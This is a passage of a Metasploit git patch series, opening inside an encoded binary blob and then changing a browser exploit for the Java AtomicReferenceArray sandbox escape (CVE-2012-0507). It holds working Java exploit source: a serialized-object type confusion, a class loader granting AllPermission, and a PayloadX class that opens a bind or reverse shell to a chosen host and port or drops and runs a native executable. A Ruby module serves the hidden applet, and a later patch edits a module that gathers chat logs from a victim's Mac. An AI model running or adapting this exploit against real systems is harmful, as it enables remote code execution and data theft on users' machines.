zvF|RI;z*a2c7?$u@>TS&J)>KYs54~Pa1YeLigSVmw#&<Lg->zE*Vm=UzR5v+UA#l)
zj3E}0rl#F~mn<929ig^tBBf+~FhF9a*f%}al-4^&ZpXMV)#P5$>p<Kg_7&;e##2+J
zVuYB|r>Us2#huw-*QXR|o)xUXApchJ=H#Q2cX$ARDAE7N5t2Vdu@O>raD)FZLzcZ)
zp??^1zmcCW3s`BW9>0144}_8zQ<W3MrMK}+K3N}&RBz5OKvq8lnY*N83#gRne9L^J
zgUY&}yw{t<=5C$69riw)%aP71z>YPTPnxh9c#!CLy}G`6{cAGg;(SwX4Qo2A(ZM;^
z>q7M)W14HbI8u@ERuobydVg00BtkMw*PpV)K!e_8RAKLTnA_nV5<%^XhKKJ(CUTb0
z^utiNLqO35q%CxiUWTWPN&CmCc;U9ckuq^9C5cEf5e|&4+&-HwU04vI1#4p0P=yE>
zxq#A}2Dae#_FwzG8BI})F=Jb+&z3Xa6qSh1Ao5Fizr50jex2=*7oneC=6F>ll3T%K
zJu10vuPsIbwT(s$YdA@{d@GoI#WZ%Ds7dEUBH+G++%;R9FuTH79$yeANO&%)7BUNq
z7P3vX@{IBffl#e4HBl}o&{_Tyl(hcxt7Rv`n47*BL~r$0h>!4G)|r@F_IOgeb|)Ew
zn9GoA!J5Xe3K5X6+p5NEt;`aHWT;Jovh+$@N3L3ssQV``k`l_bzL12^k$cYTVhzg~
z6ZB$8MSTy)QGscAzW#R^tKwm*p4fA$>~La#Snrs>Qg3b7aIrs0$D!*Gs-NzaNW9Ua
zxF+-mebgtW&*PsA7QCF=Ugh|<bCWJ)XNX&jCcI`8c5~#ax0v*DJM*|bYi;leJT&P&
z>M|IV%lEY)%AX9%hoM_Q3xWi(Av`aYAed+*-G%`i^xU(jev7GRtf`_+cwOH}%0chv
zBFkfk==GdL5Mr=TaAfiT*Ob^?@^RhP<DSMX91C4IwJ}82;Ct$@yx}OkdY@$%=(<7}
z;aoFYnV-+MpP24T9UMOeku`>sT61G47eVw{76%1dxu8X244*~GprDUfh7Tc-dH|WI
zYZ;ZUNz9RyXF8^8{+Woj@BPv(R8DVW%_mOn9*9@@HEl54yO5w}kxbu{lq_7{+pa?z
zYKDjI&6Hr#Y1Pn&j+0{{#vWnS0(##xbc4EeZL3NpmEsZ-eL62^gEL*#nmx^~gF3~w
zq!J1=zN_ZNvbLq+VH?x)Jb1=a*f5O@XRaypw{kn3OkF~DwpGp<s=c1`E2zy)kUI1!
z33!Z>A7w0CG!rSm<-=tw6?EY11{Cm7?`$>}=Hx%qqvkE(;k9uVIYHY$<vEdkm@eY3
zw$L!2U>IVfnyNoSkOZsI)qlmP0vPe7*$7GETjGpPG$}t;Kwg?U{uEpr&b326NY5qU
z;=@{%S$+Q50<D$Vt>?Ts>2MvABg?_%r03P4G}=Du2i*&fJn4j$2jEdRYCFU`d>G$L
z^aL^-dRK>S%l=d|p4PA?pl2yIB%Vmz|8m^=^bzc-e~NNZ=Q2Q!x$hfx+YbFPnDS}Y
zPcScKM(?P9DX$6j;)?;_c9UPo9Vw^R2HmSHXSMI7H*G!c%ZL!evKachI1a;@0x*Wm
zXMUg9jwD=@=!YMsEY(}6yydM88%;@z@v^&nWH?!-Og3Hurl`wPdTV7Kz(5+f&KTam
zShZMt>FxYL<fY0v;{yAB6S!odCem>Jr)k|RLr1M_i(<a(7HTDBD9}<5$syWE@P6pA
zw=>%wX>ZW^z1m(G@J#+tg^Zcd&*h{aRlK*6z#6Kx{2`ik?LH&6VRkp5LTF?xIn|S8
z<y6dkZb5)sC95kUPEx+vknoA_GlltpuiV(rb@)TP<S#!z`LK}pa?=PA>N|^6jmo+m
zTY}mFzfdU9O*juo@jfMHMh@bCt!$+OKMWI~LxX?DxS+)mTQZ1k%8~}X)c0j)8>P9o
zs&4O7zBMjIY<`TBYobNku$<e-)hg0HQzlytwd$aLp@DwVK@hWyMUu*eQ%4Ztb`Nb2
z#NY=ro3nX;-S&@E6p~3Sn+>|sYaLIQYp=zDTzQ@q?1qNc{3dfy5<kGh7)N0vckCYx
zl@XOUjU63-L;kaZsKXX$`xE&S{}K7Iu&Dt5Y6Pdd(LhN5bb{so)#FWXrjcO%)6$i9
z@dDw##RdTKZ~*}Jf7Ka(l|evy6s@SkU!(slPN@FNXdVXuaQAi;@)y#v32=LEV{h_L
zpy;Uo`vHGF{3n*k{>y_Y=^qrOlhV>d|8diQeBv*p{ykm-{~K94>Uj8nPx1dqEEWI|
I4*I+MAKMM%4gdfE

diff --git a/external/source/exploits/CVE-2012-0507/Exploit.java b/external/source/exploits/CVE-2012-0507/Exploit.java
deleted file mode 100644
index 3a1f899b9e..0000000000
--- a/external/source/exploits/CVE-2012-0507/Exploit.java
+++ /dev/null
@@ -1,58 +0,0 @@
-package a;
-
-import java.applet.Applet;
-import java.io.ByteArrayInputStream;
-import java.io.ObjectInputStream;
-import java.util.concurrent.atomic.AtomicReferenceArray;
-import a.*;
-
-// Referenced classes of package a:
-//			  Help
-
-public class Exploit extends Applet
-{
-
-	public Exploit()
-	{
-	}
-
-	public static byte[] StringToBytes(String s)
-	{
-		byte abyte0[] = new byte[s.length() / 2];
-		for(int i = 0; i < s.length(); i += 2)
-			abyte0[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16));
-
-		return abyte0;
-	}
-
-	public void init()
-	{
-		try
-		{
-			String as[] = {
-				"ACED0005757200135B4C6A6176612E6C616E672E4F62", "6A6563743B90CE589F1073296C020000787000000002", "757200095B4C612E48656C703BFE2C941188B6E5FF02", "000078700000000170737200306A6176612E7574696C", "2E636F6E63757272656E742E61746F6D69632E41746F", "6D69635265666572656E63654172726179A9D2DEA1BE", "65600C0200015B000561727261797400135B4C6A6176", "612F6C616E672F4F626A6563743B787071007E0003" 
-			};
-			StringBuilder stringbuilder = new StringBuilder();
-			for(int i = 0; i < as.length; i++)
-				stringbuilder.append(as[i]);
-
-			ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(StringToBytes(stringbuilder.toString())));
-			Object aobj[] = (Object[])(Object[])objectinputstream.readObject();
-			Help ahelp[] = (Help[])(Help[])aobj[0];
-			AtomicReferenceArray atomicreferencearray = (AtomicReferenceArray)aobj[1];
-			ClassLoader classloader = getClass().getClassLoader();
-			atomicreferencearray.set(0, classloader);
-			Help _tmp = ahelp[0];
-			
-			String data  = getParameter( "data" );
-			String jar   = getParameter( "jar" );
-			String lhost = getParameter( "lhost" );
-			String lport = getParameter( "lport" );	
-			System.out.println("go go go");
-			Help.doWork(ahelp[0], this, data, jar, lhost, ( lport == null ? 4444 : Integer.parseInt( lport ) ));
-		}
-		catch(Exception exception) { 
-			System.out.println(exception.getMessage());
-		}
-	}
-}
diff --git a/external/source/exploits/CVE-2012-0507/msf/x/Exploit.java b/external/source/exploits/CVE-2012-0507/msf/x/Exploit.java
new file mode 100644
index 0000000000..dec638d2a5
--- /dev/null
+++ b/external/source/exploits/CVE-2012-0507/msf/x/Exploit.java
@@ -0,0 +1,53 @@
+package msf.x;
+
+import java.applet.Applet;
+import java.io.ByteArrayInputStream;
+import java.io.ObjectInputStream;
+import java.util.concurrent.atomic.AtomicReferenceArray;
+
+public class Exploit extends Applet
+{
+	public Exploit() {}
+
+	public void init()
+	{
+		try
+		{
+			byte[] buf = new byte[] {
+				-84,-19,0,5,117,114,0,19,91,76,106,97,118,97,46,108,97,110,103,46,79,98,106,
+				101,99,116,59,-112,-50,88,-97,16,115,41,108,2,0,0,120,112,0,0,0,2,117,114,0,
+				13,91,76,109,115,102,46,120,46,72,101,108,112,59,-2,44,-108,17,-120,-74,-27,
+				-1,2,0,0,120,112,0,0,0,1,112,115,114,0,48,106,97,118,97,46,117,116,105,108,
+				46,99,111,110,99,117,114,114,101,110,116,46,97,116,111,109,105,99,46,65,116,
+				111,109,105,99,82,101,102,101,114,101,110,99,101,65,114,114,97,121,-87,-46,
+				-34,-95,-66,101,96,12,2,0,1,91,0,5,97,114,114,97,121,116,0,19,91,76,106,97,
+				118,97,47,108,97,110,103,47,79,98,106,101,99,116,59,120,112,113,0,126,0,3
+			};
+
+			ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(buf));
+			Object aobj[] = (Object[])objectinputstream.readObject();
+			Help ahelp[] = (Help[]) aobj[0];
+
+			AtomicReferenceArray atomicreferencearray = (AtomicReferenceArray) aobj[1];
+			ClassLoader classloader = getClass().getClassLoader();
+			atomicreferencearray.set(0, classloader);
+			Help _tmp = ahelp[0];
+
+			String data  = getParameter( "data" );
+			String jar   = getParameter( "jar" );
+			String lhost = getParameter( "lhost" );
+			String lport = getParameter( "lport" );	
+
+			Help.doWork(ahelp[0], this, data, jar, lhost, ( lport == null ? 4444 : Integer.parseInt( lport ) ));
+		}
+		catch(Exception exception) {
+			//System.out.println(exception.getMessage());
+		}
+	}
+}
+
+/*
+javac -d bin msf/x/*.java
+cd bin
+jar cvf ../CVE-2012-0507.jar msf/x/*.class
+*/
\ No newline at end of file
diff --git a/external/source/exploits/CVE-2012-0507/Help.java b/external/source/exploits/CVE-2012-0507/msf/x/Help.java
similarity index 91%
rename from external/source/exploits/CVE-2012-0507/Help.java
rename to external/source/exploits/CVE-2012-0507/msf/x/Help.java
index f340a77161..9ffcea8253 100644
--- a/external/source/exploits/CVE-2012-0507/Help.java
+++ b/external/source/exploits/CVE-2012-0507/msf/x/Help.java
@@ -1,4 +1,4 @@
-package a;
+package msf.x;
 
 import java.io.ByteArrayOutputStream;
 import java.io.IOException;
@@ -16,11 +16,11 @@ import java.lang.reflect.Field;
 
 public class Help extends ClassLoader implements Serializable{
 	public static void doWork(Help h, Exploit expl, String data, String jar, String lhost, int lport) {
-		
+
 		String classNames[] = { "msf.x.PayloadX$StreamConnector", "msf.x.PayloadX" };
 		String classPaths[] = { "/msf/x/PayloadX$StreamConnector.class", "/msf/x/PayloadX.class" };
 		Class cls = null;
-		
+
 		try
 		{
 			for( int index=0 ; index<classNames.length ; index++ )
@@ -32,26 +32,22 @@ public class Help extends ClassLoader implements Serializable{
 			
 				// read in the class file from the jar
 				InputStream is = expl.getClass().getResourceAsStream( classPaths[index] );
+
 				// and write it out to the byte array stream
 				while( ( length = is.read( buffer ) ) > 0 )
 					bos.write( buffer, 0, length );
+
 				// convert it to a simple byte array
 				buffer = bos.toByteArray();
 
 				URL url = new URL( "file:///" );
-				
 				Certificate[] certs = new Certificate[0];
-
 				Permissions perm = new Permissions();
 				perm.add( new AllPermission() );
-				
 				ProtectionDomain pd = new ProtectionDomain( new CodeSource( url, certs ), perm );
-				
 				cls = h.defineClass( classNames[index], buffer, 0, buffer.length, pd );
-				Class class_cls = cls.getClass();  
-				System.out.println("The type of the object is: " + class_cls.getName());  
 			}
-		
+
 			// cls will end up being the PayloadX class
 			if( cls != null )
 			{
@@ -60,23 +56,22 @@ public class Help extends ClassLoader implements Serializable{
 				Field payload_jar   = cls.getField( "jar" );
 				Field payload_lhost = cls.getField( "lhost" );
 				Field payload_lport = cls.getField( "lport" );
-				
+
 				// instantiate the PayloadX object once so as we can set the native payload data
 				Object obj = cls.newInstance();
-				
+
 				// set the native payload data, lhost and lport
 				payload_data.set( obj, data );
 				payload_jar.set( obj, jar );
 				payload_lhost.set( obj, lhost );
 				payload_lport.setInt( obj, lport );
-				
-				// instantiate a second PayloadX object to perform the actual payload 
+
+				// instantiate a second PayloadX object to perform the actual payload
 				obj = cls.newInstance();
 			}
 		}
 		catch( Exception e ) {
-			System.out.println(e.getMessage());
-		}		
+			//System.out.println(e.getMessage());
+		}
 	}
 }
-
diff --git a/external/source/exploits/CVE-2012-0507/msf/x/PayloadX.java b/external/source/exploits/CVE-2012-0507/msf/x/PayloadX.java
new file mode 100644
index 0000000000..5ff0e27563
--- /dev/null
+++ b/external/source/exploits/CVE-2012-0507/msf/x/PayloadX.java
@@ -0,0 +1,193 @@
+package msf.x;
+
+import java.io.BufferedReader;
+import java.io.BufferedWriter;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+import java.io.OutputStream;
+import java.io.OutputStreamWriter;
+import java.net.ServerSocket;
+import java.net.Socket;
+import java.security.AccessController;
+import java.security.PrivilegedExceptionAction;
+
+public class PayloadX implements PrivilegedExceptionAction
+{
+	// This will contain a hex string of the native payload to drop and execute.
+	public static String data = null;
+	public static String jar = null;
+	// If no native payload is set we get either a java bind shell or a java
+	// reverse shell.
+	public static String lhost = null;
+	public static int lport = 4444;
+
+	class StreamConnector extends Thread
+	{
+		InputStream is;
+		OutputStream os;
+
+		StreamConnector( InputStream is, OutputStream os )
+		{
+			this.is = is;
+			this.os = os;
+		}
+
+		public void run()
+		{
+			BufferedReader in = null;
+			BufferedWriter out = null;
+			
+			try
+			{
+				in = new BufferedReader( new InputStreamReader( is ) );
+				out = new BufferedWriter( new OutputStreamWriter( os ) );
+				char buffer[] = new char[8192];
+				int length;
+				while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
+				{
+					out.write( buffer, 0, length );
+					out.flush();
+				}
+			}
+			catch( Exception e ) {}
+
+			try
+			{
+				if( in != null )
+					in.close();
+				if( out != null )
+					out.close();
+			}
+			catch( Exception e ) {}
+		}
+	}
+
+	// http://stackoverflow.com/questions/140131/convert-a-string-representation-of-a-hex-dump-to-a-byte-array-using-java
+	public static byte[] StringToBytes( String s )
+	{
+		byte[] data = new byte[s.length() / 2];
+
+		for( int i = 0 ; i < s.length() ; i += 2 )
+			data[i / 2] = (byte)( ( Character.digit( s.charAt( i ), 16 ) << 4 ) + Character.digit( s.charAt( i + 1 ), 16 ) );
+
+		return data;
+	}
+
+	public Object run() throws Exception
+	{
+		//System.out.println("Running");
+		// if the native payload data has not been set just return for now, it
+		// will be set by the next time we reach here.
+		if( PayloadX.data == null && PayloadX.jar == null )
+			return null;
+		//System.out.println("have either data or jar");
+		
+		try
+		{
+			String os = System.getProperty( "os.name" );
+
+			//System.out.println("OS: " + os);
+			// if we have no native payload to drop and execute we default to
+			// either a TCP bind or reverse shell.
+			if( PayloadX.data != null && PayloadX.data.length() == 0 && PayloadX.jar.length() == 0 )
+			{
+				//System.out.println("no, exe/jar. Doing shell");
+				Socket client_socket = null;
+
+				String shell = "/bin/sh";
+
+				if( os.indexOf( "Windows" ) >= 0 )
+					shell = "cmd.exe";
+
+				if( PayloadX.lhost == null )
+				{
+					ServerSocket server_socket = new ServerSocket( PayloadX.lport );
+					client_socket = server_socket.accept();
+				}
+				else
+				{
+					client_socket = new Socket( PayloadX.lhost, PayloadX.lport );
+				}
+
+				if( client_socket != null )
+				{
+					Process process = exec( shell );
+					if( process != null )
+					{
+						( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start();
+						( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start();
+					}
+				}
+			}
+			else if( PayloadX.jar != null && (PayloadX.jar.length() != 0) )
+			{
+				//System.out.println("Dropping JAR");
+				String path = System.getProperty( "java.io.tmpdir" ) + File.separator + Math.random() + ".jar";
+
+				writeFile( path, StringToBytes( PayloadX.jar ) );
+				exec( "java -jar " + path + " " + PayloadX.lhost + " " + PayloadX.lport + " true");
+			}
+			else
+			{
+				//System.out.println("Dropping EXE");
+				String path = System.getProperty( "java.io.tmpdir" ) + File.separator + Math.random() + ".exe";
+
+				writeFile( path, StringToBytes( PayloadX.data ) );
+				if( os.indexOf( "Windows" ) < 0 )
+				{
+					exec( "chmod 755 " + path );
+				}
+				exec( path );
+				new File( path ).delete();
+			}
+		}
+		catch( Exception e ) {
+			//System.out.println(e);
+		}
+		
+		return null;
+	}
+
+	public Process exec( String path )
+	{
+		Process p = null;
+		//System.out.println( "Executing" );
+		try {
+			p = Runtime.getRuntime().exec( path );
+			if( p == null ) 
+			{
+				//System.out.println( "Null process, crap" ); 
+			}
+			p.waitFor();
+		} catch( Exception e ) {
+			//System.out.println(e);
+		}
+		return p;
+	}
+
+	public void writeFile( String path, byte[] data )
+	{
+		//System.out.println( "Writing file" );
+		try {
+			FileOutputStream fos = new FileOutputStream( path );
+
+			fos.write( data );
+			fos.close();
+		} catch( Exception e ) {
+			//System.out.println(e);
+		}
+	}
+	
+	public PayloadX()
+	{
+		try
+		{
+			AccessController.doPrivileged( this );
+		}
+		catch( Exception e ) {
+			//System.out.println(e);
+		}
+	}
+}
diff --git a/modules/exploits/multi/browser/java_atomicreferencearray.rb b/modules/exploits/multi/browser/java_atomicreferencearray.rb
index 1ce83d4457..26fffc96ea 100644
--- a/modules/exploits/multi/browser/java_atomicreferencearray.rb
+++ b/modules/exploits/multi/browser/java_atomicreferencearray.rb
@@ -15,21 +15,21 @@ class Metasploit3 < Msf::Exploit::Remote
 	include Msf::Exploit::EXE
 
 	def initialize( info = {} )
-
 		super( update_info( info,
-			'Name'          => 'Java AtomicReferenceArray Type Violation Vulnerability',
-			'Description'   => %q{
+			'Name'           => 'Java AtomicReferenceArray Type Violation Vulnerability',
+			'Description'    => %q{
 					This module exploits a vulnerability due to the fact that
 				AtomicReferenceArray uses the Unsafe class to store a reference in an
 				array directly, which may violate type safety if not used properly.
 				This allows a way to escape the JRE sandbox, and load additional classes
 				in order to perform malicious operations.
 			},
-			'License'       => MSF_LICENSE,
-			'Author'        =>
+			'License'        => MSF_LICENSE,
+			'Author'         =>
 				[
-					'sinn3r', # metasploit module
-					'juan vazquez' # metasploit module
+					'sinn3r',       # metasploit module
+					'juan vazquez', # metasploit module
+					'egypt'         # special assistance
 				],
 			'References'     =>
 				[
@@ -39,9 +39,9 @@ class Metasploit3 < Msf::Exploit::Remote
 					['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'],
 					['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507']
 				],
-			'Platform'      => [ 'java', 'win', 'osx', 'linux', 'solaris' ],
-			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
-			'Targets'       =>
+			'Platform'       => [ 'java', 'win', 'osx', 'linux', 'solaris' ],
+			'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
+			'Targets'        =>
 				[
 					[ 'Generic (Java Payload)',
 						{
@@ -92,9 +92,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def on_request_uri( cli, request )
-		data = nil
-		host = nil
-		port = nil
+		data = ""
+		host = ""
+		port = ""
 		peer = "#{cli.peerhost}:#{cli.peerport}"
 
 		if not request.uri.match(/\.jar$/i)
@@ -148,16 +148,18 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
-		print_status( "#{peer} - sending jar to ..." )
+		print_status( "#{peer} - sending jar..." )
 		send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } )
 
 		handler( cli )
 	end
 
 	def generate_html( data, jar, host, port )
+		jar_name = rand_text_alpha(rand(6)+3) + ".jar"
+
 		html  = "<html><head></head>"
 		html += "<body>"
-		html += "<applet archive=\"Applet.jar\" code=\"a.Exploit.class\" width=\"1\" height=\"1\">"
+		html += "<applet archive=\"#{jar_name}\" code=\"msf.x.Exploit.class\" width=\"1\" height=\"1\">"
 		html += "<param name=\"data\" value=\"#{data}\"/>" if data
 		html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar
 		html += "<param name=\"lhost\" value=\"#{host}\"/>" if host

From ae21c05e692382eb09d1ee15bbc3f6453ad1cc0b Mon Sep 17 00:00:00 2001
From: Steve Tornio <swtornio@gmail.com>
Date: Fri, 30 Mar 2012 07:26:07 -0500
Subject: [PATCH 4/5] add osvdb ref

---
 modules/exploits/multi/browser/java_atomicreferencearray.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/exploits/multi/browser/java_atomicreferencearray.rb b/modules/exploits/multi/browser/java_atomicreferencearray.rb
index 26fffc96ea..c24a6029a0 100644
--- a/modules/exploits/multi/browser/java_atomicreferencearray.rb
+++ b/modules/exploits/multi/browser/java_atomicreferencearray.rb
@@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'References'     =>
 				[
 					['CVE', '2012-0507'],
+					['OSVDB', '80724'],
 					['BID', '52161'],
 					['URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3'],
 					['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'],

From 18a13a4bfb6c8fa6876a0bd4547bba350858f2bf Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Fri, 30 Mar 2012 11:22:55 -0500
Subject: [PATCH 5/5] Correct description

---
 modules/post/osx/gather/enum_colloquy.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/post/osx/gather/enum_colloquy.rb b/modules/post/osx/gather/enum_colloquy.rb
index 9394d9c221..a0cb1f9994 100644
--- a/modules/post/osx/gather/enum_colloquy.rb
+++ b/modules/post/osx/gather/enum_colloquy.rb
@@ -20,12 +20,12 @@ class Metasploit3 < Msf::Post
 			'Name'          => 'OSX Gather Colloquy Enumeration',
 			'Description'   => %q{
 					This module will collect Colloquy's info plist file and chat logs from the
-				victim's machine.  There are three actions you may choose:  INFO, and CHATS, and
-				ALL.  Please note that the CHAT action may time a long time depending on the
+				victim's machine.  There are three actions you may choose:  INFO, CHATS, and
+				ALL.  Please note that the CHAT action may take a long time depending on the
 				victim machine, therefore we suggest to set the regex 'PATTERN' option in order
 				to search for certain log names (which consists of the contact's name, and a
 				timestamp).  The default 'PATTERN' is configured as "^alien" as an example
-				to search for any chatlogs associated with the name "alien".
+				to search for any chat logs associated with the name "alien".
 			},
 			'License'       => MSF_LICENSE,
 			'Author'        => [ 'sinn3r'],